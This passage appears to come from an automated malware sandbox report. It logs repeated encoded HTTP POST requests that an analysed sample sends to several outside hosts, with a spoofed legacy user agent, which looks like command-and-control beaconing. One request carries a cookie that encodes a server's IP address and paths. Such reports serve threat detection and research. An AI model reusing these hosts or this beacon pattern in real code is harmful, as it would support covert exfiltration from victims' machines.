61 33 56 34 75 77 4d 6f 48 2f 30 67 43 5a 68 4e 6b 66 43 78 53 78 4e 6e 68 68 38 45 6e 51 45 73 71 4c 61 56 56 34 66 48 4c 56 44 78 75 4b 52 77 47 38 64 52 78 43 4e 51 5a 32 57 31 63 49 48 7a 4c 78 45 59 62 58 42 6e 46 76 79 66 37 49 4b 6c 61 6f 7a 39 48 48 79 68 68 7a 49 53 77 5a 75 52 6e 39 44 74 78 47 4b 6c 37 51 44 51 73 51 76 30 73 39 6e 4c 73 6b 34 74 77 6d 48 7a 6d 30 69 58 6b 63 67 69 7a 4f 6d 76 42 6e 6c 4f 56 2f 79 6e 44 67 32 6e 48 4a 62 71 71 33 65 68 35 56 66 Data Ascii: SMZu6vc3A2gj0KWHZjQEREDdlIitR0tKG0MKn/YQjRhqUH+hAAUi+lZex8luvZ+4UPvx4ZBzhlqZyqWvXS+XTu+7ED9X6DBGqN/HO+OW0A0wWyDvO0s3VgNvb+b/fGw0g65tYQ9wCIb0AWBYIiggGKVDKE//pEAuSZDVCFENVE6Sn6kXgZcxvQrvYPNNPT2s1YMPn7jNjQRKt/oEqUtRGSktk2AIHs3Iijx4IfzExtBVs22tdBZncjdsFesdn29+dpwQ+c0/oyM9jp1y/3zlU8945mVvXtkM1xgQpsk5lisjuFDiq8aEIiS+Zzs5UA8iiH9BHeJ0QGeYl2OwX6yUePsovOh1/TaGy9r886vhlPWjMwRmH79nWNBi2Oalca3V4uwMoH/0gCZhNkfCxSxNnhh8EnQEsqLaVV4fHLVDxuKRwG8dRxCNQZ2W1cIHzLxEYbXBnFvyf7IKlaoz9HHyhhzISwZuRn9DtxGKl7QDQsQv0s9nLsk4twmHzm0iXkcgizOmvBnlOV/ynDg2nHJbqq3eh5Vf
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 4c 65 53 44 36 41 67 6f 41 32 69 4d 36 2f 78 47 53 79 74 54 72 33 74 30 69 49 32 51 2b 33 74 64 76 4a 4f 71 6f 52 38 64 64 67 43 6e 73 32 35 4a 6a 33 36 4a 32 56 66 43 46 42 65 4a 77 64 46 43 76 56 73 37 76 43 76 67 45 5a 65 71 63 68 55 4a 71 73 6a 54 66 51 74 52 41 34 61 48 50 79 6b 72 66 2b 46 2f 68 79 4d 37 41 6f 30 35 6c 71 32 49 6c 48 50 69 6b 66 56 31 71 34 73 47 42 75 64 4f 30 42 68 36 66 66 37 30 32 54 69 72 35 6b 67 47 64 55 55 33 2f 4d 73 44 4d 6f 4d 36 41 62 5a 33 53 32 76 33 57 54 79 67 4f 4f 75 35 6b 37 62 6c 77 2f 78 43 53 54 52 61 7a 37 39 48 38 68 6a 48 56 73 50 6f 57 4a 39 32 6e 62 65 6d 47 6b 59 6a 66 50 70 71 38 57 63 4b 6d 67 70 66 77 2f 45 4b 30 54 30 57 46 69 4d 64 4e 49 41 79 72 6a 63 54 51 47 69 43 44 4a 48 73 45 48 2b 4f 74 57 4d 73 2b 61 53 7a 78 4a 65 38 45 34 33 58 78 65 66 57 75 72 76 31 4d 76 69 67 6f 63 51 68 66 2f 77 45 36 52 2f 38 4c 30 63 74 75 4d 6e 47 6c 6c 72 6b 37 78 6e 35 61 54 7a 78 70 53 64 57 53 6a 49 47 47 51 6e 57 2f 63 44 38 64 42 66 6a 74 37 75 58 34 62 5a 51 48 71 64 46 32 75 4d 49 49 61 66 31 35 67 58 64 59 6e 46 58 74 65 65 62 2b 31 51 56 62 6d 65 77 67 72 46 33 2b 65 5a 79 55 75 47 39 75 47 59 74 6f 4f 42 59 4d 41 50 6b 4d 4a 73 45 2b 78 52 49 62 37 2f 78 6c 39 4d 7a 70 30 45 4d 35 6b 74 4c 43 51 4d 65 4a 56 58 4e 34 6b 54 36 51 43 67 66 61 4a 36 2b 2f 6b 68 6d 43 4e 46 42 2f 55 59 52 45 79 4c 33 4b 54 6b 6f 53 52 51 57 50 4b 42 31 41 4b 52 54 37 76 79 59 42 4f 74 65 39 67 74 6a 4c 6a 4d 6b 73 44 73 52 4f 57 6a 6d 33 64 71 2b 72 37 50 47 2f 61 64 65 64 54 2b 50 36 39 36 34 4b 5a 2f 67 4b 53 73 46 5a 74 51 50 64 71 4e 37 61 55 52 31 58 6c 33 33 38 64 44 74 62 52 61 48 6b 32 68 55 58 32 4e 4d 32 54 4c 41 45 79 76 52 2b 30 4d 6b 34 72 64 63 59 52 78 51 66 6a 53 66 Data Ascii: LeSD6AgoA2iM6/xGSytTr3t0iI2Q+3tdvJOqoR8ddgCns25Jj36J2VfCFBeJwdFCvVs7vCvgEZeqchUJqsjTfQtRA4aHPykrf+F/hyM7Ao05lq2IlHPikfV1q4sGBudO0Bh6ff702Tir5kgGdUU3/MsDMoM6AbZ3S2v3WTygOOu5k7blw/xCSTRaz79H8hjHVsPoWJ92nbemGkYjfPpq8WcKmgpfw/EK0T0WFiMdNIAyrjcTQGiCDJHsEH+OtWMs+aSzxJe8E43XxefWurv1MvigocQhf/wE6R/8L0ctuMnGllrk7xn5aTzxpSdWSjIGGQnW/cD8dBfjt7uX4bZQHqdF2uMIIaf15gXdYnFXteeb+1QVbmewgrF3+eZyUuG9uGYtoOBYMAPkMJsE+xRIb7/xl9Mzp0EM5ktLCQMeJVXN4kT6QCgfaJ6+/khmCNFB/UYREyL3KTkoSRQWPKB1AKRT7vyYBOte9gtjLjMksDsROWjm3dq+r7PG/adedT+P6964KZ/gKSsFZtQPdqN7aUR1Xl338dDtbRaHk2hUX2NM2TLAEyvR+0Mk4rdcYRxQfjSf
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWkJxSFk2RFVZU1VtUjRLSTBoQkxTd0FBQUEwIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaQnFIWTZEVVlTVW1SNEtJMGhCTFN3QUFBQTAiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU0MCIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiMTAyLjEyOS4xNDMuNzgiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjYyNDcyIiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY3OTQ2MDE5NS4wNzg4MzIsIlJFUVVFU1RfVElNRSI6MTY3OTQ2MDE5NSwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ0eXBlIjoiZGlyZWN0IiwidmFsdWUiOiIxMDIuMTI5LjE0My43OCIsInVybCI6bnVsbCwiaXAiOiIxMDIuMTI5LjE0My43OCJ9; shield-notbot-nonce=0f30939aff
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 79 55 55 37 35 31 30 64 41 32 6a 43 6d 48 51 67 6c 48 39 66 6f 4a 62 31 51 39 63 4c 32 45 64 74 34 58 73 77 69 74 42 39 4a 6e 51 43 39 4f 5a 4f 2b 65 78 36 4e 4f 4e 74 4c 63 63 6b 52 41 33 34 76 4f 4e 65 4d 71 76 74 56 36 67 46 62 66 36 65 4d 49 66 76 4e 4a 6a 73 43 57 4b 72 77 43 74 6f 31 75 5a 4d 69 2b 6f 5a 59 39 61 4d 56 68 79 64 71 69 4e 52 4e 43 73 52 52 65 79 42 67 6f 77 79 5a 53 41 4b 50 61 42 39 66 7a 6b 43 55 62 75 6b 6d 67 50 6d 78 4d 62 68 58 33 2b 34 4f 36 74 34 45 5a 4c 79 76 5a 62 73 33 36 6b 57 54 44 32 74 6b 4f 49 68 44 43 66 35 31 68 74 6d 6a 67 66 35 33 54 77 4c 55 33 62 58 6c 68 6f 62 6a 65 48 4e 46 44 4a 48 5a 6d 77 35 64 56 42 73 2b 65 6f 57 49 48 34 65 66 62 4b 2b 62 34 51 64 4f 64 36 70 71 73 69 77 78 59 4d 33 56 30 35 33 66 76 77 59 4d 4f 66 68 6a 77 42 62 33 4c 43 30 46 79 43 33 79 6b 54 78 74 55 4f 4f 2f 33 46 43 4e 74 61 42 4f 63 36 71 74 4b 4c 47 74 70 4b 63 32 58 6a 6d 38 58 36 66 65 34 65 66 57 79 35 6b 79 30 44 2b 77 47 6d 4c 4c 78 4e 66 61 77 37 48 47 56 44 73 42 76 34 35 53 6e 31 43 4d 64 4d 59 38 34 48 6e 59 44 39 51 4d 31 74 68 45 45 61 56 59 6a 38 58 77 37 50 41 36 44 34 2f 4c 35 4e 56 6a 59 68 6e 41 2b 34 59 6e 4c 54 51 36 5a 39 55 6a 73 70 34 50 54 59 63 78 46 31 38 35 73 6c 47 37 48 76 2b 77 43 30 59 4d 57 54 41 2b 6c 61 53 57 45 46 33 41 62 4e 39 79 30 5a 44 4a 48 74 68 6a 6d 73 74 37 66 79 42 38 39 6f 75 50 38 7a 33 41 4d 31 6a 34 56 45 35 45 72 34 51 75 61 4a 44 4c 45 38 71 65 71 69 47 66 31 32 57 48 71 45 79 5a 45 62 43 36 48 62 6e 54 70 69 69 4f 50 69 43 67 78 33 33 67 45 59 65 63 31 7a 32 76 61 39 53 6a 41 67 38 32 2f 4a 35 56 31 65 78 7a 4b 6c 66 36 48 34 3d Data Ascii: yUU7510dA2jCmHQglH9foJb1Q9cL2Edt4XswitB9JnQC9OZO+ex6NONtLcckRA34vONeMqvtV6gFbf6eMIfvNJjsCWKrwCto1uZMi+oZY9aMVhydqiNRNCsRReyBgowyZSAKPaB9fzkCUbukmgPmxMbhX3+4O6t4EZLyvZbs36kWTD2tkOIhDCf51htmjgf53TwLU3bXlhobjeHNFDJHZmw5dVBs+eoWIH4efbK+b4QdOd6pqsiwxYM3V053fvwYMOfhjwBb3LC0FyC3ykTxtUOO/3FCNtaBOc6qtKLGtpKc2Xjm8X6fe4efWy5ky0D+wGmLLxNfaw7HGVDsBv45Sn1CMdMY84HnYD9QM1thEEaVYj8Xw7PA6D4/L5NVjYhnA+4YnLTQ6Z9Ujsp4PTYcxF185slG7Hv+wC0YMWTA+laSWEF3AbN9y0ZDJHthjmst7fyB89ouP8z3AM1j4VE5Er4QuaJDLE8qeqiGf12WHqEyZEbC6HbnTpiiOPiCgx33gEYec1z2va9SjAg82/J5V1exzKlf6H4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 31 4f 42 4f 59 73 5a 44 6d 69 69 38 7a 59 37 34 71 48 6d 6f 66 54 37 4e 42 33 52 4b 71 51 38 37 35 4f 31 53 64 34 4c 78 4b 51 7a 45 6d 6a 54 2b 34 78 30 71 43 6b 72 76 6c 32 74 65 2b 6a 66 79 4d 53 48 47 68 75 73 32 44 45 73 78 52 64 56 6e 50 54 50 70 69 4e 53 6b 43 39 46 55 47 78 71 6b 41 74 4c 33 47 35 4a 2b 44 47 6c 6b 55 64 54 6c 46 69 37 70 4c 53 79 79 37 75 35 6d 73 45 59 37 51 71 36 72 78 65 2b 58 4e 66 6c 70 45 37 36 4c 6e 36 55 4a 38 62 6d 42 67 71 58 4e 59 46 44 68 6e 76 55 4f 42 45 63 56 6f 61 72 69 4f 6a 48 71 46 58 74 44 6d 46 52 58 45 48 4c 72 48 4c 6f 77 31 56 56 48 4a 77 68 63 57 6a 66 62 4c 51 6f 47 62 6c 31 78 7a 39 44 59 68 61 38 61 44 36 54 6c 66 34 4a 70 66 55 64 4c 32 37 46 41 7a 67 54 55 49 37 59 64 33 79 2b 33 45 6c 6e 33 39 6d 67 33 6e 56 63 30 62 53 2f 47 42 41 65 65 5a 6c 49 77 77 70 54 38 51 30 79 75 32 65 5a 6e 38 38 38 56 7a 6b 79 65 31 71 6f 39 32 41 65 30 67 65 6f 54 58 32 2b 71 34 56 2b 39 45 76 43 64 48 68 64 50 38 6d 31 6b 6e 45 41 4f 76 33 4b 6b 57 4f 41 32 74 6f 31 74 77 4b 46 33 76 6b 55 4b 41 76 37 47 78 2b 49 38 56 58 6d 6c 59 6d 49 57 6d 6a 70 48 31 39 58 35 39 66 4e 59 2f 6e 42 52 51 5a 36 4c 39 4c 47 69 78 4c 55 46 51 6b 49 6c 65 43 59 44 41 63 72 58 7a 44 49 43 52 73 4b 44 6b 69 6e 64 4d 4c 7a 71 63 44 4d 4a 36 61 71 41 39 38 53 74 4b 44 6c 45 34 79 33 78 4a 44 68 76 31 42 4a 45 56 62 47 65 64 36 58 46 74 79 4b 4f 52 63 71 59 77 32 55 57 6e 55 73 41 66 47 4b 37 46 2b 63 6f 58 77 33 6d 47 34 42 62 32 58 56 65 56 6e 52 38 4e 47 65 34 63 4b 6d 32 57 48 58 49 67 59 75 57 6b 61 59 4d 36 69 42 4e 46 57 4e 76 43 75 62 51 32 67 73 Data Ascii: G1OBOYsZDmii8zY74qHmofT7NB3RKqQ875O1Sd4LxKQzEmjT+4x0qCkrvl2te+jfyMSHGhus2DEsxRdVnPTPpiNSkC9FUGxqkAtL3G5J+DGlkUdTlFi7pLSyy7u5msEY7Qq6rxe+XNflpE76Ln6UJ8bmBgqXNYFDhnvUOBEcVoariOjHqFXtDmFRXEHLrHLow1VVHJwhcWjfbLQoGbl1xz9DYha8aD6Tlf4JpfUdL27FAzgTUI7Yd3y+3Eln39mg3nVc0bS/GBAeeZlIwwpT8Q0yu2eZn888Vzkye1qo92Ae0geoTX2+q4V+9EvCdHhdP8m1knEAOv3KkWOA2to1twKF3vkUKAv7Gx+I8VXmlYmIWmjpH19X59fNY/nBRQZ6L9LGixLUFQkIleCYDAcrXzDICRsKDkindMLzqcDMJ6aqA98StKDlE4y3xJDhv1BJEVbGed6XFtyKORcqYw2UWnUsAfGK7F+coXw3mG4Bb2XVeVnR8NGe4cKm2WHXIgYuWkaYM6iBNFWNvCubQ2gs
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 31 4f 42 4f 59 73 5a 44 6d 69 69 38 7a 59 37 34 71 48 6d 6f 66 54 37 4e 42 33 52 4b 71 51 38 37 35 4f 31 53 64 34 4c 78 4b 51 7a 45 6d 6a 54 2b 34 78 30 71 43 6b 72 76 6c 32 74 65 2b 6a 66 79 4d 53 48 47 68 75 73 32 44 45 73 78 52 64 56 6e 50 54 50 70 69 4e 53 6b 43 39 46 55 47 78 71 6b 41 74 4c 33 47 35 4a 2b 44 47 6c 6b 55 64 54 6c 46 69 37 70 4c 53 79 79 37 75 35 6d 73 45 59 37 51 71 36 72 78 65 2b 58 4e 66 6c 70 45 37 36 4c 6e 36 55 4a 38 62 6d 42 67 71 58 4e 59 46 44 68 6e 76 55 4f 42 45 63 56 6f 61 72 69 4f 6a 48 71 46 58 74 44 6d 46 52 58 45 48 4c 72 48 4c 6f 77 31 56 56 48 4a 77 68 63 57 6a 66 62 4c 51 6f 47 62 6c 31 78 7a 39 44 59 68 61 38 61 44 36 54 6c 66 34 4a 70 66 55 64 4c 32 37 46 41 7a 67 54 55 49 37 59 64 33 79 2b 33 45 6c 6e 33 39 6d 67 33 6e 56 63 30 62 53 2f 47 42 41 65 65 5a 6c 49 77 77 70 54 38 51 30 79 75 32 65 5a 6e 38 38 38 56 7a 6b 79 65 31 71 6f 39 32 41 65 30 67 65 6f 54 58 32 2b 71 34 56 2b 39 45 76 43 64 48 68 64 50 38 6d 31 6b 6e 45 41 4f 76 33 4b 6b 57 4f 41 32 74 6f 31 74 77 4b 46 33 76 6b 55 4b 41 76 37 47 78 2b 49 38 56 58 6d 6c 59 6d 49 57 6d 6a 70 48 31 39 58 35 39 66 4e 59 2f 6e 42 52 51 5a 36 4c 39 4c 47 69 78 4c 55 46 51 6b 49 6c 65 43 59 44 41 63 72 58 7a 44 49 43 52 73 4b 44 6b 69 6e 64 4d 4c 7a 71 63 44 4d 4a 36 61 71 41 39 38 53 74 4b 44 6c 45 34 79 33 78 4a 44 68 76 31 42 4a 45 56 62 47 65 64 36 58 46 74 79 4b 4f 52 63 71 59 77 32 55 57 6e 55 73 41 66 47 4b 37 46 2b 63 6f 58 77 33 6d 47 34 42 62 32 58 56 65 56 6e 52 38 4e 47 65 34 63 4b 6d 32 57 48 58 49 67 59 75 57 6b 61 59 4d 36 69 42 4e 46 57 4e 76 43 75 62 51 32 67 73 Data Ascii: G1OBOYsZDmii8zY74qHmofT7NB3RKqQ875O1Sd4LxKQzEmjT+4x0qCkrvl2te+jfyMSHGhus2DEsxRdVnPTPpiNSkC9FUGxqkAtL3G5J+DGlkUdTlFi7pLSyy7u5msEY7Qq6rxe+XNflpE76Ln6UJ8bmBgqXNYFDhnvUOBEcVoariOjHqFXtDmFRXEHLrHLow1VVHJwhcWjfbLQoGbl1xz9DYha8aD6Tlf4JpfUdL27FAzgTUI7Yd3y+3Eln39mg3nVc0bS/GBAeeZlIwwpT8Q0yu2eZn888Vzkye1qo92Ae0geoTX2+q4V+9EvCdHhdP8m1knEAOv3KkWOA2to1twKF3vkUKAv7Gx+I8VXmlYmIWmjpH19X59fNY/nBRQZ6L9LGixLUFQkIleCYDAcrXzDICRsKDkindMLzqcDMJ6aqA98StKDlE4y3xJDhv1BJEVbGed6XFtyKORcqYw2UWnUsAfGK7F+coXw3mG4Bb2XVeVnR8NGe4cKm2WHXIgYuWkaYM6iBNFWNvCubQ2gs
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 31 4f 42 4f 59 73 5a 44 6d 69 69 38 7a 59 37 34 71 48 6d 6f 66 54 37 4e 42 33 52 4b 71 51 38 37 35 4f 31 53 64 34 4c 78 4b 51 7a 45 6d 6a 54 2b 34 78 30 71 43 6b 72 76 6c 32 74 65 2b 6a 66 79 4d 53 48 47 68 75 73 32 44 45 73 78 52 64 56 6e 50 54 50 70 69 4e 53 6b 43 39 46 55 47 78 71 6b 41 74 4c 33 47 35 4a 2b 44 47 6c 6b 55 64 54 6c 46 69 37 70 4c 53 79 79 37 75 35 6d 73 45 59 37 51 71 36 72 78 65 2b 58 4e 66 6c 70 45 37 36 4c 6e 36 55 4a 38 62 6d 42 67 71 58 4e 59 46 44 68 6e 76 55 4f 42 45 63 56 6f 61 72 69 4f 6a 48 71 46 58 74 44 6d 46 52 58 45 48 4c 72 48 4c 6f 77 31 56 56 48 4a 77 68 63 57 6a 66 62 4c 51 6f 47 62 6c 31 78 7a 39 44 59 68 61 38 61 44 36 54 6c 66 34 4a 70 66 55 64 4c 32 37 46 41 7a 67 54 55 49 37 59 64 33 79 2b 33 45 6c 6e 33 39 6d 67 33 6e 56 63 30 62 53 2f 47 42 41 65 65 5a 6c 49 77 77 70 54 38 51 30 79 75 32 65 5a 6e 38 38 38 56 7a 6b 79 65 31 71 6f 39 32 41 65 30 67 65 6f 54 58 32 2b 71 34 56 2b 39 45 76 43 64 48 68 64 50 38 6d 31 6b 6e 45 41 4f 76 33 4b 6b 57 4f 41 32 74 6f 31 74 77 4b 46 33 76 6b 55 4b 41 76 37 47 78 2b 49 38 56 58 6d 6c 59 6d 49 57 6d 6a 70 48 31 39 58 35 39 66 4e 59 2f 6e 42 52 51 5a 36 4c 39 4c 47 69 78 4c 55 46 51 6b 49 6c 65 43 59 44 41 63 72 58 7a 44 49 43 52 73 4b 44 6b 69 6e 64 4d 4c 7a 71 63 44 4d 4a 36 61 71 41 39 38 53 74 4b 44 6c 45 34 79 33 78 4a 44 68 76 31 42 4a 45 56 62 47 65 64 36 58 46 74 79 4b 4f 52 63 71 59 77 32 55 57 6e 55 73 41 66 47 4b 37 46 2b 63 6f 58 77 33 6d 47 34 42 62 32 58 56 65 56 6e 52 38 4e 47 65 34 63 4b 6d 32 57 48 58 49 67 59 75 57 6b 61 59 4d 36 69 42 4e 46 57 4e 76 43 75 62 51 32 67 73 Data Ascii: G1OBOYsZDmii8zY74qHmofT7NB3RKqQ875O1Sd4LxKQzEmjT+4x0qCkrvl2te+jfyMSHGhus2DEsxRdVnPTPpiNSkC9FUGxqkAtL3G5J+DGlkUdTlFi7pLSyy7u5msEY7Qq6rxe+XNflpE76Ln6UJ8bmBgqXNYFDhnvUOBEcVoariOjHqFXtDmFRXEHLrHLow1VVHJwhcWjfbLQoGbl1xz9DYha8aD6Tlf4JpfUdL27FAzgTUI7Yd3y+3Eln39mg3nVc0bS/GBAeeZlIwwpT8Q0yu2eZn888Vzkye1qo92Ae0geoTX2+q4V+9EvCdHhdP8m1knEAOv3KkWOA2to1twKF3vkUKAv7Gx+I8VXmlYmIWmjpH19X59fNY/nBRQZ6L9LGixLUFQkIleCYDAcrXzDICRsKDkindMLzqcDMJ6aqA98StKDlE4y3xJDhv1BJEVbGed6XFtyKORcqYw2UWnUsAfGK7F+coXw3mG4Bb2XVeVnR8NGe4cKm2WHXIgYuWkaYM6iBNFWNvCubQ2gs
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 31 4f 42 4f 59 73 5a 44 6d 69 69 38 7a 59 37 34 71 48 6d 6f 66 54 37 4e 42 33 52 4b 71 51 38 37 35 4f 31 53 64 34 4c 78 4b 51 7a 45 6d 6a 54 2b 34 78 30 71 43 6b 72 76 6c 32 74 65 2b 6a 66 79 4d 53 48 47 68 75 73 32 44 45 73 78 52 64 56 6e 50 54 50 70 69 4e 53 6b 43 39 46 55 47 78 71 6b 41 74 4c 33 47 35 4a 2b 44 47 6c 6b 55 64 54 6c 46 69 37 70 4c 53 79 79 37 75 35 6d 73 45 59 37 51 71 36 72 78 65 2b 58 4e 66 6c 70 45 37 36 4c 6e 36 55 4a 38 62 6d 42 67 71 58 4e 59 46 44 68 6e 76 55 4f 42 45 63 56 6f 61 72 69 4f 6a 48 71 46 58 74 44 6d 46 52 58 45 48 4c 72 48 4c 6f 77 31 56 56 48 4a 77 68 63 57 6a 66 62 4c 51 6f 47 62 6c 31 78 7a 39 44 59 68 61 38 61 44 36 54 6c 66 34 4a 70 66 55 64 4c 32 37 46 41 7a 67 54 55 49 37 59 64 33 79 2b 33 45 6c 6e 33 39 6d 67 33 6e 56 63 30 62 53 2f 47 42 41 65 65 5a 6c 49 77 77 70 54 38 51 30 79 75 32 65 5a 6e 38 38 38 56 7a 6b 79 65 31 71 6f 39 32 41 65 30 67 65 6f 54 58 32 2b 71 34 56 2b 39 45 76 43 64 48 68 64 50 38 6d 31 6b 6e 45 41 4f 76 33 4b 6b 57 4f 41 32 74 6f 31 74 77 4b 46 33 76 6b 55 4b 41 76 37 47 78 2b 49 38 56 58 6d 6c 59 6d 49 57 6d 6a 70 48 31 39 58 35 39 66 4e 59 2f 6e 42 52 51 5a 36 4c 39 4c 47 69 78 4c 55 46 51 6b 49 6c 65 43 59 44 41 63 72 58 7a 44 49 43 52 73 4b 44 6b 69 6e 64 4d 4c 7a 71 63 44 4d 4a 36 61 71 41 39 38 53 74 4b 44 6c 45 34 79 33 78 4a 44 68 76 31 42 4a 45 56 62 47 65 64 36 58 46 74 79 4b 4f 52 63 71 59 77 32 55 57 6e 55 73 41 66 47 4b 37 46 2b 63 6f 58 77 33 6d 47 34 42 62 32 58 56 65 56 6e 52 38 4e 47 65 34 63 4b 6d 32 57 48 58 49 67 59 75 57 6b 61 59 4d 36 69 42 4e 46 57 4e 76 43 75 62 51 32 67 73 Data Ascii: G1OBOYsZDmii8zY74qHmofT7NB3RKqQ875O1Sd4LxKQzEmjT+4x0qCkrvl2te+jfyMSHGhus2DEsxRdVnPTPpiNSkC9FUGxqkAtL3G5J+DGlkUdTlFi7pLSyy7u5msEY7Qq6rxe+XNflpE76Ln6UJ8bmBgqXNYFDhnvUOBEcVoariOjHqFXtDmFRXEHLrHLow1VVHJwhcWjfbLQoGbl1xz9DYha8aD6Tlf4JpfUdL27FAzgTUI7Yd3y+3Eln39mg3nVc0bS/GBAeeZlIwwpT8Q0yu2eZn888Vzkye1qo92Ae0geoTX2+q4V+9EvCdHhdP8m1knEAOv3KkWOA2to1twKF3vkUKAv7Gx+I8VXmlYmIWmjpH19X59fNY/nBRQZ6L9LGixLUFQkIleCYDAcrXzDICRsKDkindMLzqcDMJ6aqA98StKDlE4y3xJDhv1BJEVbGed6XFtyKORcqYw2UWnUsAfGK7F+coXw3mG4Bb2XVeVnR8NGe4cKm2WHXIgYuWkaYM6iBNFWNvCubQ2gs
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 31 4f 42 4f 59 73 5a 44 6d 69 69 38 7a 59 37 34 71 48 6d 6f 66 54 37 4e 42 33 52 4b 71 51 38 37 35 4f 31 53 64 34 4c 78 4b 51 7a 45 6d 6a 54 2b 34 78 30 71 43 6b 72 76 6c 32 74 65 2b 6a 66 79 4d 53 48 47 68 75 73 32 44 45 73 78 52 64 56 6e 50 54 50 70 69 4e 53 6b 43 39 46 55 47 78 71 6b 41 74 4c 33 47 35 4a 2b 44 47 6c 6b 55 64 54 6c 46 69 37 70 4c 53 79 79 37 75 35 6d 73 45 59 37 51 71 36 72 78 65 2b 58 4e 66 6c 70 45 37 36 4c 6e 36 55 4a 38 62 6d 42 67 71 58 4e 59 46 44 68 6e 76 55 4f 42 45 63 56 6f 61 72 69 4f 6a 48 71 46 58 74 44 6d 46 52 58 45 48 4c 72 48 4c 6f 77 31 56 56 48 4a 77 68 63 57 6a 66 62 4c 51 6f 47 62 6c 31 78 7a 39 44 59 68 61 38 61 44 36 54 6c 66 34 4a 70 66 55 64 4c 32 37 46 41 7a 67 54 55 49 37 59 64 33 79 2b 33 45 6c 6e 33 39 6d 67 33 6e 56 63 30 62 53 2f 47 42 41 65 65 5a 6c 49 77 77 70 54 38 51 30 79 75 32 65 5a 6e 38 38 38 56 7a 6b 79 65 31 71 6f 39 32 41 65 30 67 65 6f 54 58 32 2b 71 34 56 2b 39 45 76 43 64 48 68 64 50 38 6d 31 6b 6e 45 41 4f 76 33 4b 6b 57 4f 41 32 74 6f 31 74 77 4b 46 33 76 6b 55 4b 41 76 37 47 78 2b 49 38 56 58 6d 6c 59 6d 49 57 6d 6a 70 48 31 39 58 35 39 66 4e 59 2f 6e 42 52 51 5a 36 